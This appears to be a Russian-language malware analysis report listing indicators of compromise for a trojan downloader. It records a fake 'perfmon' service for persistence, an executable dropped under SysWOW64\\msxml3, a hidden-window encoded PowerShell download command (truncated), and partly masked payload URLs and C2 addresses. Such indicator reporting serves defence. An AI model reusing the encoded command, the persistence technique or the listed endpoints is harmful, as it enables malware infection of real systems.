Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\perfmon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\perfmon] 'ImagePath' = '"%WINDIR%\SysWOW64\msxml3\perfmon.exe"'
- 'perfmon' "%WINDIR%\SysWOW64\msxml3\perfmon.exe"
- 'perfmon' %WINDIR%\SysWOW64\msxml3\perfmon.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHgAYwB3ADkAeQAyAD0AKAAnAEMAJwArACcAeAAnACsAKAAnAGYAJwArACcAbwB3AHkANgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIAbwBGAGkATABFAFwAcABkAH...
- %HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe
- %WINDIR%\syswow64\msxml3\perfmon.exe
- %HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe в %WINDIR%\syswow64\msxml3\perfmon.exe
- '11#.2.218.1':80
- '51.##4.140.91':7080
- http://ho####er-thoma.de/Resources/file/POyhgRg/
- http://gr##icon.es/SOPORTE/PFY2b1s5v35546172/
- http://51.###.140.91:7080/pOC7/ via 51.##4.140.91
- DNS ASK ho####er-thoma.de
- DNS ASK gr##icon.es
- '%HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe'
- '%WINDIR%\syswow64\msxml3\perfmon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHgAYwB3ADkAeQAyAD0AKAAnAEMAJwArACcAeAAnACsAKAAnAGYAJwArACcAbwB3AHkANgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIAbwBGAGkATABFAFwAcABkAH...' (со скрытым окном)